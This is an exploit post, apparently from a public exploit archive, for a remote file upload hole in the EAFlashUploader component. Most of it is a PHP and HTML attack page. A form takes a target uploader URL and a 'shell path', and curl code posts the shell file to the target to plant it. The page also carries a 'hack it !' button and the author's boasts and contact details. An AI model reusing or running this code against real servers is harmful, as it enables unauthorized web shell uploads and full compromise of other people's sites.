#############################################################################
### Exploit Title: "EAFLASH Uploader Remote File Upload vulnerability
### Author: NEt_Bomber
### Contact: http://facebook.com/net.bomba
### Software Link: http://www.easyalgo.com/eaflashupload.aspx
### Google Dork: o.O u can find 1
### Tested on: Linux/Windows
#############################################################################
#POC:
The picture and the video below shows u everything:
http://data.imagup.com/11/1176057939.png
https://www.youtube.com/watch?v=l0S4c4IZXHc
#EXPLOIT:
---------------------------------------------------------------------------------
<html><body>
<center>
<font color=red size=10>EAFlashUploader Exploit By NEt_Bomber</font><br>
We Are Algerians
We are genius
We make u move from where u can't expect ...
</center>
<title>EAFlashUploader Exploit By NEt_Bomber</title>
<br>
<br>
<form method=GET action="<?php echo $_SERVER['PHP_SELF']; ?>" >
<table border=1>
<tr>
<td width=100>Target Uploader:</td>
<td width=400><input type=text name=target size=50 /></td>
</tr>
<tr>
<td width=100>Ur shell path:</td>
<td width=400><input type=text name=shell_url size=50 /></td></tr>
<tr><td>
<input type=submit name=hack value="hack it !"></td></tr></form>
</body></html>
<?php
//Coded By NEt_Bomber
//fb:http://fb.me/net.bomba
//email:karimbomber@gmail.com
$uploader=$_GET['target'];
$shell=$_GET['shell_url'];
$post = array('coder'=>'NEt_Bomber','tag' => 'hacked','Filedata'=>'@'.$shell);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$uploader);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$result=curl_exec ($ch);
curl_close ($ch);
echo $result;
?>
------------------------------------------------------------------------------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information